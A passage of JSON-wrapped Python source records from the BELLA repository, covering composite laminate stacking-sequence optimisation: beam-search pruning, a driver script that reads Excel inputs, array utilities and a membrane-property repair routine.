tab_child_pdl[ind_pd]\r\n del tab_penalty_spacing[ind_pd]\r\n del tab_angle_queue[ind_pd]\r\n del tab_last_pdl_index[ind_pd]\r\n continue\r\n else:\r\n penalty_10 = 0\r\n# print('mother_penalty_10', mother_penalty_10)\r\n# child_penalty_10 = deepcopy(mother_penalty_10)\r\n# child_penalty_10[ind_panel_now] = penalty_10\r\n # print('child_penalty_10', child_penalty_10)\r\n\r\n ### calculation of objective function values\r\n obj_no_constraints = calc_obj_one_panel(\r\n lampam=child_lampam[ind_panel_now],\r\n lampam_target=multipanel.reduced.panels[\r\n ind_panel_now].lampam_target,\r\n lampam_weightings=multipanel.reduced.panels[\r\n ind_panel_now].lampam_weightings)\r\n\r\n# print('mother_obj_no_constraints', mother_obj_no_constraints)\r\n child_obj_no_constraints = deepcopy(mother_obj_no_constraints)\r\n child_obj_no_constraints[\r\n ind_panel_now] = obj_no_constraints\r\n # print('child_obj_no_constraints', child_obj_no_constraints)\r\n\r\n child_obj_constraints = calc_obj_multi_panel(\r\n objective=child_obj_no_constraints,\r\n actual_panel_weightings=multipanel.reduced.actual_panel_weightings,\r\n penalty_diso=None,\r\n penalty_contig=None,\r\n penalty_oopo=None,\r\n penalty_10=None,\r\n penalty_bal_ipo=None,\r\n penalty_weight=None,\r\n with_Nones=True)\r\n# print('child_obj_constraints', child_obj_constraints)\r\n\r\n ### saving\r\n tab_child_n_plies_per_angle.append(child_n_plies_per_angle)\r\n tab_child_lampam.append(child_lampam)\r\n # tab_child_penalty_oopo.append(child_penalty_oopo)\r\n# tab_child_penalty_diso.append(child_penalty_diso)\r\n# tab_child_penalty_contig.append(child_penalty_contig)\r\n# tab_child_penalty_10.append(child_penalty_10)\r\n tab_child_obj_no_constraints.append(child_obj_no_constraints)\r\n tab_child_obj_constraints.append(child_obj_constraints)\r\n\r\n 
n_obj_func_calls += 1\r\n n_tab_nodes += 1\r\n\r\n ### local pruning for the other guidelines and stiffness optimality\r\n indices_to_keep = []\r\n tab_child_obj_constraints_for_pruning \\\r\n = np.copy(tab_child_obj_constraints)\r\n if ind_step != n_steps - 1 \\\r\n and len(tab_child_obj_constraints_for_pruning) \\\r\n > parameters.local_node_limit2:\r\n\r\n while len(indices_to_keep) < parameters.local_node_limit2:\r\n \r\n min_value = min(tab_child_obj_constraints_for_pruning)\r\n index_to_add = np.where(\r\n tab_child_obj_constraints_for_pruning == min_value)[0][0]\r\n indices_to_keep.append(index_to_add)\r\n tab_child_obj_constraints_for_pruning[index_to_add] = 1000\r\n\r\n indices_to_keep.sort()\r\n# print('indices_to_keep', indices_to_keep)\r\n tab_child_pdl = [tab_child_pdl[index] \\\r\n for index in indices_to_keep]\r\n tab_last_pdl_index = [tab_last_pdl_index[index] \\\r\n for index in indices_to_keep]\r\n tab_penalty_spacing = [tab_penalty_spacing[index] \\\r\n for index in indices_to_keep]\r\n tab_angle_queue = [tab_angle_queue[index] \\\r\n for index in indices_to_keep]\r\n tab_child_n_plies_per_angle = [\r\n tab_child_n_plies_per_angle[index] \\\r\n for index in indices_to_keep]\r\n tab_child_lampam = [tab_child_lampam[index] \\\r\n for index in indices_to_keep]\r\n # tab_child_penalty_oopo = [tab_child_penalty_oopo[index] \\\r\n # for index in indices_to_keep]\r\n# tab_child_penalty_diso = [tab_child_penalty_diso[index] \\\r\n# for index in indices_to_keep]\r\n# tab_child_penalty_contig = [tab_child_penalty_contig[index] \\\r\n# for index in indices_to_keep]\r\n# tab_child_penalty_10 = [tab_child_penalty_10[index] \\\r\n# for index in indices_to_keep]\r\n tab_child_obj_no_constraints = [\r\n tab_child_obj_no_constraints[index] \\\r\n for index in indices_to_keep]\r\n tab_child_obj_constraints = [tab_child_obj_constraints[index] \\\r\n for index in indices_to_keep]\r\n\r\n ### save local solutions as global solutions\r\n for ind in range(len(tab_child_obj_constraints)):\r\n\r\n pdls_tab.append(tab_child_pdl[ind])\r\n last_pdl_index_tab.append(tab_last_pdl_index[ind])\r\n penalty_spacing_tab.append(tab_penalty_spacing[ind])\r\n angle_queue_tab.append(tab_angle_queue[ind])\r\n n_plies_per_angle_tab.append(tab_child_n_plies_per_angle[ind])\r\n lampam_tab.append(tab_child_lampam[ind])\r\n# penalty_diso_tab.append(tab_child_penalty_diso[ind])\r\n# penalty_contig_tab.append(tab_child_penalty_contig[ind])\r\n # penalty_oopo_tab.append(tab_child_penalty_oopo[ind])\r\n# penalty_10_tab.append(tab_child_penalty_10[ind])\r\n obj_constraints_tab = np.hstack((\r\n obj_constraints_tab, tab_child_obj_constraints[ind]))\r\n obj_no_constraints_tab.append(\r\n tab_child_obj_no_constraints[ind])\r\n\r\n# ### remove duplicates\r\n# to_del = []\r\n# for ind_pdl_1 in range(len(pdls_tab)):\r\n# for ind_pdl_2 in range(ind_pdl_1 + 1, len(pdls_tab)):\r\n# if is_same_pdl(pdls_tab[ind_pdl_1],\r\n# pdls_tab[ind_pdl_2],\r\n# thick_to_thin=True,\r\n# ind_ref=multipanel.reduced.ind_ref):\r\n# to_del.append(ind_pdl_1)\r\n# break\r\n# to_del.sort(reverse=True)\r\n# for ind_to_del in to_del:\r\n# del pdls_tab[ind_to_del]\r\n# del penalty_spacing_tab[ind_to_del]\r\n# del last_pdl_index_tab[ind_to_del]\r\n# del angle_queue_tab[ind_to_del]\r\n# del n_plies_per_angle_tab[ind_to_del]\r\n# del lampam_tab[ind_to_del]\r\n# del penalty_diso_tab[ind_to_del]\r\n# del penalty_contig_tab[ind_to_del]\r\n# del penalty_oopo_tab[ind_to_del]\r\n# del penalty_10_tab[ind_to_del]\r\n# del obj_no_constraints_tab[ind_to_del]\r\n# 
obj_constraints_tab = np.delete(obj_constraints_tab,\r\n# np.s_[ind_to_del])\r\n\r\n #### global pruning for ply-drop layout rules\r\n indices_to_keep = []\r\n penalty_spacing_tab_for_pruning = np.copy(penalty_spacing_tab)\r\n if ind_step != n_steps - 1 \\\r\n and len(penalty_spacing_tab_for_pruning) \\\r\n > parameters.global_node_limit2:\r\n\r\n while len(indices_to_keep) < parameters.global_node_limit2:\r\n\r\n min_value = min(penalty_spacing_tab_for_pruning)\r\n indices_to_add = np.where(\r\n penalty_spacing_tab_for_pruning == min_value)[0]\r\n for elem in indices_to_add:\r\n indices_to_keep.append(elem)\r\n penalty_spacing_tab_for_pruning[elem] = 1000\r\n\r\n indices_to_keep.sort()\r\n pdls_tab = [pdls_tab[index] for index in indices_to_keep]\r\n last_pdl_index_tab = [last_pdl_index_tab[index] \\\r\n for index in indices_to_keep]\r\n penalty_spacing_tab = [penalty_spacing_tab[index] \\\r\n for index in indices_to_keep]\r\n angle_queue_tab = [angle_queue_tab[index] \\\r\n for index in indices_to_keep]\r\n n_plies_per_angle_tab = [n_plies_per_angle_tab[index] \\\r\n for index in indices_to_keep]\r\n lampam_tab = [lampam_tab[index] \\\r\n for index in indices_to_keep]\r\n# penalty_diso_tab = [penalty_diso_tab[index] \\\r\n# for index in indices_to_keep]\r\n# penalty_contig_tab = [penalty_contig_tab[index] \\\r\n# for index in indices_to_keep]\r\n # penalty_oopo_tab = [penalty_oopo_tab[index] \\\r\n # for index in indices_to_keep]\r\n# penalty_10_tab = [penalty_10_tab[index] \\\r\n# for index in indices_to_keep]\r\n obj_constraints_tab = [obj_constraints_tab[index] \\\r\n for index in indices_to_keep]\r\n obj_no_constraints_tab = [obj_no_constraints_tab[index] \\\r\n for index in indices_to_keep]\r\n\r\n #### global pruning for the other guidelines and stiffness optimality\r\n indices_to_keep = []\r\n tab_child_obj_constraints_for_pruning \\\r\n = np.copy(obj_constraints_tab)\r\n\r\n if ind_step != n_steps - 1 \\\r\n and len(tab_child_obj_constraints_for_pruning) \\\r\n > parameters.global_node_limit2:\r\n\r\n while len(indices_to_keep) < parameters.global_node_limit2:\r\n\r\n min_value = min(tab_child_obj_constraints_for_pruning)\r\n index_to_add = np.where(\r\n tab_child_obj_constraints_for_pruning == min_value)[0][0]\r\n indices_to_keep.append(index_to_add)\r\n tab_child_obj_constraints_for_pruning[index_to_add] = 1000\r\n\r\n indices_to_keep.sort()\r\n pdls_tab = [pdls_tab[index] for index in indices_to_keep]\r\n last_pdl_index_tab = [last_pdl_index_tab[index] \\\r\n for index in indices_to_keep]\r\n penalty_spacing_tab = [penalty_spacing_tab[index] \\\r\n for index in indices_to_keep]\r\n angle_queue_tab = [angle_queue_tab[index] \\\r\n for index in indices_to_keep]\r\n n_plies_per_angle_tab = [n_plies_per_angle_tab[index] \\\r\n for index in indices_to_keep]\r\n lampam_tab = [lampam_tab[index] \\\r\n for index in indices_to_keep]\r\n# penalty_diso_tab = [penalty_diso_tab[index] \\\r\n# for index in indices_to_keep]\r\n# penalty_contig_tab = [penalty_contig_tab[index] \\\r\n# for index in indices_to_keep]\r\n # penalty_oopo_tab = [penalty_oopo_tab[index] \\\r\n # for index in indices_to_keep]\r\n# penalty_10_tab = [penalty_10_tab[index] \\\r\n# for index in indices_to_keep]\r\n obj_constraints_tab = [obj_constraints_tab[index] \\\r\n for index in indices_to_keep]\r\n obj_no_constraints_tab = [obj_no_constraints_tab[index] \\\r\n for index in indices_to_keep]\r\n\r\n if len(obj_constraints_tab) == 0:\r\n return False, reduced_sst, reduced_lampam, reduced_ss\r\n\r\n # select best 
repaired solution\r\n index = np.argmin(obj_constraints_tab)\r\n reduced_sst = pdls_tab[index]\r\n reduced_lampam = lampam_tab[index]\r\n reduced_ss = convert_sst_to_ss(reduced_sst)\r\n\r\n ## check for symmetry\r\n if constraints.sym:\r\n for elem in reduced_ss[0: multipanel.reduced.ind_ref]:\r\n for ind in range(elem.size // 2):\r\n if elem[ind] != elem[- ind - 1]:\r\n raise Exception('reduced_ss not symmetric')\r\n for elem in reduced_sst[0: multipanel.reduced.ind_ref]:\r\n for ind in range(n_plies_max // 2):\r\n if elem[ind] != elem[- ind - 1]:\r\n raise Exception('reduced_sst not symmetric')\r\n\r\n ## test for the partial lamination parameters\r\n reduced_lampam_test = calc_lampam(reduced_ss, constraints)\r\n if not abs(reduced_lampam - reduced_lampam_test).all() < 1e-13:\r\n raise Exception(\"\"\"\r\nbeam search does not return group lamination parameters matching\r\nthe group stacking sequences.\"\"\")\r\n\r\n ## test for the ply counts\r\n for ind_panel in range(multipanel.reduced.ind_ref):\r\n if reduced_ss[ind_panel].size \\\r\n != multipanel.reduced.n_plies_in_panels[ind_panel]:\r\n raise Exception(\"\"\"\r\nWrong ply counts in the laminate. This should not happen.\"\"\")\r\n\r\n# print_list_ss(reduced_sst)\r\n return True, reduced_sst, reduced_lampam, reduced_ss\r\n\r\n\r\n"
},
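Editor's note (added): the repair_thin_to_thick routine embedded in the record above repeatedly prunes its candidate lists by keeping only the nodes with the smallest penalty or objective values, up to a branching limit, and it keeps every tie at the current minimum. A minimal, self-contained sketch of that keep-the-best pruning pattern follows; prune_keep_best and node_limit are illustrative names, not part of the BELLA API, and np.inf replaces the source's magic sentinel value of 1000 so the sketch also works when objectives exceed 1000.

import numpy as np

def prune_keep_best(values, node_limit):
    """Indices of the smallest entries of `values`, up to `node_limit`.

    Mirrors the pruning loops in repair_thin_to_thick: every tie at the
    current minimum is kept, so slightly more than `node_limit` indices
    can survive, exactly as in the original loops.
    """
    values = np.array(values, dtype=float, copy=True)
    if values.size <= node_limit:
        return list(range(values.size))
    indices_to_keep = []
    while len(indices_to_keep) < node_limit:
        min_value = values.min()
        for index in np.where(values == min_value)[0]:
            indices_to_keep.append(int(index))
            values[index] = np.inf  # mark this entry as consumed
    indices_to_keep.sort()
    return indices_to_keep

# Keep the 3 best (smallest-objective) candidates out of 6:
print(prune_keep_best([0.8, 0.1, 0.5, 0.1, 0.9, 0.3], 3))  # [1, 3, 5]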
{
"alpha_fraction": 0.5856741666793823,
"alphanum_fraction": 0.591292142868042,
"avg_line_length": 33.70000076293945,
"blob_id": "eb50a2d68e51711e6eb6555c22a55c22fbdde339",
"content_id": "0198d4ba570e28cc8461e71e875b8bd28dd9f2bc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 712,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 20,
"path": "/src/divers/edit_multiple_files.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "import os\r\nimport fnmatch\r\n\r\ndef findReplace(directory, find, replace, filePattern):\r\n for path, dirs, files in os.walk(os.path.abspath(directory)):\r\n for filename in fnmatch.filter(files, filePattern):\r\n filepath = os.path.join(path, filename)\r\n with open(filepath) as f:\r\n s = f.read()\r\n s = s.replace(find, replace)\r\n with open(filepath, \"w\") as f:\r\n f.write(s)\r\n\r\nfind = \"from src.LAYLA_V02\"\r\nreplace = \"from src.LAYLA_V02\"\r\n\r\n#findReplace(r'C:\\BELLA', find, replace, '*.py')\r\n#findReplace(r'C:\\LAYLA', find, replace, '*.py')\r\n#findReplace(r'C:\\RELAY', find, replace, '*.py')\r\nfindReplace(r'C:\\BELLA', find, replace, '*.py')"
},
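Editor's note (added): findReplace in the record above walks a directory tree and rewrites every file whose name matches a pattern; as committed, its find and replace strings are identical, so the invocation at the bottom of the file is a no-op. A hedged usage sketch with explicit encoding handling (all paths and strings below are illustrative, not from the source):

import fnmatch
import os

def find_replace(directory, find, replace, file_pattern):
    """Replace `find` with `replace` in every file matching `file_pattern`.

    Functionally the same as findReplace above, with UTF-8 encoding made
    explicit so non-ASCII sources read identically on every platform.
    """
    for path, _dirs, files in os.walk(os.path.abspath(directory)):
        for filename in fnmatch.filter(files, file_pattern):
            filepath = os.path.join(path, filename)
            with open(filepath, encoding="utf-8") as f:
                contents = f.read()
            with open(filepath, "w", encoding="utf-8") as f:
                f.write(contents.replace(find, replace))

# Illustrative call: rename an import prefix across a project tree.
# find_replace(r"C:\BELLA", "from src.OLD_PKG", "from src.NEW_PKG", "*.py")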
{
"alpha_fraction": 0.5199508666992188,
"alphanum_fraction": 0.5537139177322388,
"avg_line_length": 29.941177368164062,
"blob_id": "7a0faaf064f83c72083c9018e435de86a91f8ef4",
"content_id": "3852abadf5ce7262e5fd241ee6a9fb8277b96945",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1629,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 51,
"path": "/src/divers/arrays.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis module contains functions for manipulating and combining Python arrays.\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\ndef max_arrays(array1, array2):\r\n \"\"\"\r\n returns an array collating the element-wise maximum values from two arrays\r\n\r\n Args:\r\n array1 (numpy array): The first array\r\n array2 (numpy array): The second array\r\n\r\n Returns:\r\n array: the element-wise maximum values of ``array1`` and ``array2``.\r\n\r\n Raises:\r\n ValueError: If the size of the arrays ```array1`` and ``array2`` are\r\n different.\r\n\r\n Examples:\r\n >>> max_arrays(np.array([1., 4., 5.]), np.array([4., 3., 5.]))\r\n array([4., 4., 5.])\r\n \"\"\"\r\n if isinstance(array1, (int, float)):\r\n array1 = np.array([array1])\r\n if isinstance(array2, (int, float)):\r\n array2 = np.array([array2])\r\n\r\n if array1.size == 1:\r\n if array2.size == 1:\r\n return np.array([max(array1[0], array2[0])], float)\r\n\r\n array1 = array1[0] * np.ones(array2.shape)\r\n return np.array([max(array1[ind], array2[ind]) \\\r\n for ind in range(array2.size)], float)\r\n\r\n if array2.size == 1:\r\n array2 = array2[0] * np.ones(array1.shape)\r\n return np.array([max(array1[ind], array2[ind]) \\\r\n for ind in range(array2.size)], float)\r\n\r\n if array1.size != array2.size:\r\n raise ValueError(\"Both arrays must have the same length.\")\r\n\r\n return np.array([max(array1[ind], array2[ind]) \\\r\n for ind in range(array2.size)], float)\r\n"
},
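Editor's note (added): max_arrays in the record above hand-rolls the scalar promotion and element-wise comparison that NumPy's built-in np.maximum already provides, vectorised, through broadcasting. A short equivalence check (illustrative only; like max_arrays, np.maximum returns a float array on float inputs):

import numpy as np

a = np.array([1., 4., 5.])
b = np.array([4., 3., 5.])
print(np.maximum(a, b))    # [4. 4. 5.] -- matches the max_arrays docstring
print(np.maximum(a, 2.0))  # [2. 4. 5.] -- scalar broadcast, no special-casing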
{
"alpha_fraction": 0.6459389328956604,
"alphanum_fraction": 0.6703569293022156,
"avg_line_length": 36.51394271850586,
"blob_id": "f5642b3f85fdd42d7219bc53d4c9e2c115e34694",
"content_id": "f94b0df68a29e1ed2875b8c09ecc961e3c1dfbb0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9665,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 251,
"path": "/run_BELLA_from_input_file_horseshoe.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nScript to retrieve a blended multi-panel layout based on:\r\n - a panel thickness distribution\r\n - set of lamination parameter targets for each panel\r\nThe thicknesses and lamination parameters match the targets of the horseshoe\r\nproblem and are found in input_file_horseshoe_... .xlsx.\r\ny\"\"\"\r\n\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport pandas as pd\r\nimport numpy as np\r\nimport numpy.matlib\r\nimport random\r\nrandom.seed(0)\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.BELLA.materials import Material\r\nfrom src.BELLA.optimiser import BELLA_optimiser\r\nfrom src.divers.excel import delete_file\r\n\r\nfilename = 'input_file_horseshoe.xlsx'\r\nfilename = 'input_file_horseshoe2.xlsx'\r\nfilename_input = '/BELLA/input-files/' + filename\r\nfilename_result = ('results_BELLA_thin_' + filename).replace('input_file_', '')\r\n\r\n# check for authorisation before overwriting\r\ndelete_file(filename_result)\r\n\r\n### Design guidelines ---------------------------------------------------------\r\n\r\ndata_constraints = pd.read_excel(filename_input, sheet_name='Constraints',\r\n header=None, index_col=0).T\r\nsym = data_constraints[\"symmetry\"].iloc[0]\r\nbal = data_constraints[\"balance\"].iloc[0]\r\noopo = data_constraints[\"out-of-plane orthotropy\"].iloc[0]\r\ndam_tol = data_constraints[\"damage tolerance\"].iloc[0]\r\ndam_tol_rule = int(data_constraints[\"dam_tol_rule\"].iloc[0])\r\ncovering = data_constraints[\"covering\"].iloc[0]\r\nn_covering = int(data_constraints[\"n_covering\"].iloc[0])\r\nrule_10_percent = data_constraints[\"10% rule\"].iloc[0]\r\nrule_10_Abdalla = data_constraints[\"10% rule applied on LPs\"].iloc[0]\r\npercent_Abdalla = float(data_constraints[\r\n \"percentage limit when rule applied on LPs\"].iloc[0])\r\npercent_0 = float(data_constraints[\"percent_0\"].iloc[0])\r\npercent_45 = float(data_constraints[\"percent_45\"].iloc[0])\r\npercent_90 = float(data_constraints[\"percent_90\"].iloc[0])\r\npercent_135 = float(data_constraints[\"percent_-45\"].iloc[0])\r\npercent_45_135 = float(data_constraints[\"percent_+-45\"].iloc[0])\r\ndiso = data_constraints[\"diso\"].iloc[0]\r\ndelta_angle = float(data_constraints[\"delta_angle\"].iloc[0])\r\ncontig = data_constraints[\"contig\"].iloc[0]\r\nn_contig = int(data_constraints[\"n_contig\"].iloc[0])\r\nset_of_angles = np.array(\r\n data_constraints[\"fibre orientations\"].iloc[0].split(\" \"), int)\r\npdl_spacing = data_constraints[\"ply drop spacing rule\"].iloc[0]\r\nmin_drop = int(data_constraints[\r\n \"minimum number of continuous plies between ply drops\"].iloc[0])\r\nconstraints = Constraints(\r\n sym=sym,\r\n bal=bal,\r\n oopo=oopo,\r\n dam_tol=dam_tol,\r\n dam_tol_rule=dam_tol_rule,\r\n covering=covering,\r\n n_covering=n_covering,\r\n rule_10_percent=rule_10_percent,\r\n rule_10_Abdalla=rule_10_Abdalla,\r\n percent_Abdalla=percent_Abdalla,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n diso=diso,\r\n contig=contig,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n set_of_angles=set_of_angles,\r\n min_drop=min_drop,\r\n pdl_spacing=pdl_spacing)\r\n\r\n### Optimiser parameters 
------------------------------------------------------\r\n\r\n## For step 2 of BELLA\r\n\r\n# Number of initial ply drops to be tested\r\nn_ini_ply_drops = 10\r\n# Minimum ply count for ply groups during ply drop layout generation\r\ngroup_size_min = 8\r\n# Desired ply count for ply groups during ply drop layout generation\r\ngroup_size_max = 12\r\n# Time limit to create a group ply-drop layout\r\ntime_limit_group_pdl = 1\r\n# Time limit to create a ply-drop layout\r\ntime_limit_all_pdls = 10\r\n\r\n## For step 3 of BELLA\r\n\r\n# Branching limit for global pruning\r\nglobal_node_limit = 100\r\n# Branching limit for local pruning\r\nlocal_node_limit = 100\r\n# Branching limit for global pruning at the last level \r\nglobal_node_limit_final = 1\r\n# Branching limit for local pruning at the last level \r\nlocal_node_limit_final = 100\r\n\r\n## For step 4.1 of BELLA\r\n\r\n# to save repair success rates\r\nsave_success_rate = True\r\n# Thickness of the reference panels\r\nn_plies_ref_panel = 1\r\n# repair to improve the convergence towards the in-plane lamination parameter\r\n# targets\r\nrepair_membrane_switch = True\r\n# repair to improve the convergence towards the out-of-plane lamination\r\n# parameter targets\r\nrepair_flexural_switch = True\r\n# percentage of laminate thickness for plies that can be modified during\r\n# the refinement of membrane properties\r\np_A = 80\r\n# number of plies in the last permutation during repair for disorientation\r\n# and/or contiguity\r\nn_D1 = 6\r\n# number of ply shifts tested at each step of the re-designing process during\r\n# refinement of flexural properties\r\nn_D2 = 10\r\n# number of times the algorithms 1 and 2 are repeated during the flexural\r\n# property refinement\r\nn_D3 = 2\r\n\r\n## For step 4.2 of BELLA\r\n\r\n# Branching limit for global pruning during ply drop layout optimisation\r\nglobal_node_limit2 = 5\r\n# Branching limit for local pruning during ply drop layout optimisation\r\nlocal_node_limit2 = global_node_limit2\r\n\r\n## For step 4.3 of BELLA\r\n\r\n# Branching limit for global pruning during ply drop layout optimisation\r\nglobal_node_limit3 = 5\r\n# Branching limit for local pruning during ply drop layout optimisation\r\nlocal_node_limit3 = global_node_limit3\r\n\r\nparameters = Parameters(\r\n constraints=constraints,\r\n group_size_min=group_size_min,\r\n group_size_max=group_size_max,\r\n n_ini_ply_drops=n_ini_ply_drops,\r\n global_node_limit=global_node_limit,\r\n global_node_limit_final=global_node_limit_final,\r\n local_node_limit=local_node_limit,\r\n local_node_limit_final=local_node_limit_final,\r\n global_node_limit2=global_node_limit2,\r\n local_node_limit2=local_node_limit2,\r\n global_node_limit3=global_node_limit3,\r\n local_node_limit3=local_node_limit3,\r\n save_success_rate=save_success_rate,\r\n p_A=p_A,\r\n n_D1=n_D1,\r\n n_D2=n_D2,\r\n n_D3=n_D3,\r\n repair_membrane_switch=repair_membrane_switch,\r\n repair_flexural_switch=repair_flexural_switch,\r\n n_plies_ref_panel=n_plies_ref_panel,\r\n time_limit_group_pdl=time_limit_group_pdl,\r\n time_limit_all_pdls=time_limit_all_pdls,\r\n save_buckling=True)\r\n\r\n### Material properties -------------------------------------------------------\r\n\r\ndata_materials = pd.read_excel(filename_input, sheet_name='Materials',\r\n header=None, index_col=0).T\r\nE11 = data_materials[\"E11\"].iloc[0]\r\nE22 = data_materials[\"E22\"].iloc[0]\r\nnu12 = data_materials[\"nu12\"].iloc[0]\r\nG12 = data_materials[\"G12\"].iloc[0]\r\ndensity_area = data_materials[\"areal 
density\"].iloc[0]\r\nply_t = data_materials[\"ply thickness\"].iloc[0]\r\nmaterials = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n\r\n### Objective function parameters ---------------------------------------------\r\n\r\ndata_objective = pd.read_excel(filename_input, sheet_name='Objective function',\r\n header=None, index_col=0).T\r\ncoeff_10 = data_objective[\"coeff_10\"].iloc[0]\r\ncoeff_contig = data_objective[\"coeff_contig\"].iloc[0]\r\ncoeff_diso = data_objective[\"coeff_diso\"].iloc[0]\r\ncoeff_oopo = data_objective[\"coeff_oopo\"].iloc[0]\r\ncoeff_spacing = data_objective[\"coeff_spacing\"].iloc[0]\r\n\r\nobj_func_param = ObjFunction(\r\n constraints=constraints,\r\n coeff_contig=coeff_contig,\r\n coeff_diso=coeff_diso,\r\n coeff_10=coeff_10,\r\n coeff_oopo=coeff_oopo,\r\n coeff_spacing=coeff_spacing)\r\n\r\n### Multi-panel composite laminate layout -------------------------------------\r\n\r\ndata_panels = pd.read_excel(filename_input, sheet_name='Panels')\r\n\r\nlampam_weightings_all = data_panels[[\r\n \"lampam_weightings[1]\", \"lampam_weightings[2]\", \"lampam_weightings[3]\",\r\n \"lampam_weightings[4]\", \"lampam_weightings[5]\", \"lampam_weightings[6]\",\r\n \"lampam_weightings[7]\", \"lampam_weightings[8]\", \"lampam_weightings[9]\",\r\n \"lampam_weightings[10]\", \"lampam_weightings[11]\", \"lampam_weightings[12]\"]]\r\n\r\nlampam_targets_all = data_panels[[\r\n \"lampam_target[1]\", \"lampam_target[2]\", \"lampam_target[3]\",\r\n \"lampam_target[4]\", \"lampam_target[5]\", \"lampam_target[6]\",\r\n \"lampam_target[7]\", \"lampam_target[8]\", \"lampam_target[9]\",\r\n \"lampam_target[10]\", \"lampam_target[11]\", \"lampam_target[12]\"]]\r\n\r\npanels = []\r\nfor ind_panel in range(data_panels.shape[0]):\r\n panels.append(Panel(\r\n ID=int(data_panels[\"Panel ID\"].iloc[ind_panel]),\r\n lampam_target=np.array(lampam_targets_all.iloc[ind_panel], float),\r\n lampam_weightings=np.array(lampam_weightings_all.iloc[ind_panel], float),\r\n n_plies=int(data_panels[\"Number of plies\"].iloc[ind_panel]),\r\n weighting=float(data_panels[\r\n \"Weighting in MP objective funtion\"].iloc[ind_panel]),\r\n neighbour_panels=np.array(data_panels[\r\n \"Neighbour panel IDs\"].iloc[ind_panel].split(\" \"), int),\r\n constraints=constraints,\r\n length_x=float(data_panels[\"Length_x\"].iloc[ind_panel]),\r\n length_y=float(data_panels[\"Length_y\"].iloc[ind_panel]),\r\n N_x=float(data_panels[\"N_x\"].iloc[ind_panel]),\r\n N_y=float(data_panels[\"N_y\"].iloc[ind_panel])))\r\n\r\n\r\nmultipanel = MultiPanel(panels)\r\n\r\n\r\n### Optimiser Run -------------------------------------------------------------\r\nresult = BELLA_optimiser(multipanel, parameters, obj_func_param, constraints,\r\n filename_result, materials)"
},
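Editor's note (added): the driver script above loads each configuration sheet with pd.read_excel(..., header=None, index_col=0) followed by .T, which turns a two-column key/value sheet into a one-row frame addressed by parameter name; note also that its first filename assignment is immediately overwritten, so only input_file_horseshoe2.xlsx is ever read. Below is a self-contained sketch of the same transpose-and-index pattern, using an in-memory frame since no spreadsheet ships with this note:

import pandas as pd

# Stand-in for pd.read_excel(name, sheet_name='Constraints', header=None,
# index_col=0): parameter names in the index, values in a single column.
raw = pd.DataFrame({0: [True, 5.0]}, index=["symmetry", "delta_angle"])

data_constraints = raw.T  # one row; columns are now the parameter names
sym = data_constraints["symmetry"].iloc[0]
delta_angle = float(data_constraints["delta_angle"].iloc[0])
print(sym, delta_angle)   # True 5.0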
{
"alpha_fraction": 0.6061015725135803,
"alphanum_fraction": 0.6269550323486328,
"avg_line_length": 36.61940383911133,
"blob_id": "6a84d889f2d14b818e15677ade00b3d3eac19561",
"content_id": "a44095bb3586449dc54a9c3e0e725f0888b479d0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5179,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 134,
"path": "/src/RELAY/repair_membrane_1_no_ipo_Abdalla.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\n- repair_membrane_1_no_ipo:\r\n repair for membrane properties only accounting for one panel when the\r\n laminate does not have to remain balanced\r\n \"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport math as ma\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.divers.sorting import sortAccording\r\nfrom src.RELAY.repair_10_bal import calc_ind_plies\r\nfrom src.RELAY.repair_10_bal import calc_lampamA_ply_queue\r\nfrom src.RELAY.repair_membrane_1_no_ipo import calc_objA_options_3\r\nfrom src.RELAY.repair_10_bal import calc_lampamA_options_3\r\nfrom src.guidelines.ten_percent_rule_Abdalla import calc_distance_Abdalla\r\n\r\ndef repair_membrane_1_no_ipo_Abdalla(\r\n ss_ini, ply_queue_ini, in_plane_coeffs,\r\n p_A, lampam_target, constraints):\r\n \"\"\"\r\n modifies a stacking sequence to better converge towards the in-plane target\r\n lamination parameters. The modifications preserves the satisfaction to the\r\n 10% rule, to the balance requirements and to the damage tolerance\r\n constraints.\r\n\r\n The fibre orientations are modified one by one.\r\n\r\n INPUTS\r\n\r\n - ss_ini: partially retrieved stacking sequence\r\n - ply_queue_ini: queue of plies for innermost plies\r\n - in_plane_coeffs: coefficients in the in-plane objective function\r\n - p_A: coefficient for the proportion of the laminate thickness that can be\r\n modified during the repair for membrane properties\r\n - lampam_target: lamination parameter targets\r\n - constraints: design and manufacturing constraints\r\n \"\"\"\r\n n_plies = ss_ini.size\r\n\r\n ss = np.copy(ss_ini)\r\n ply_queue = 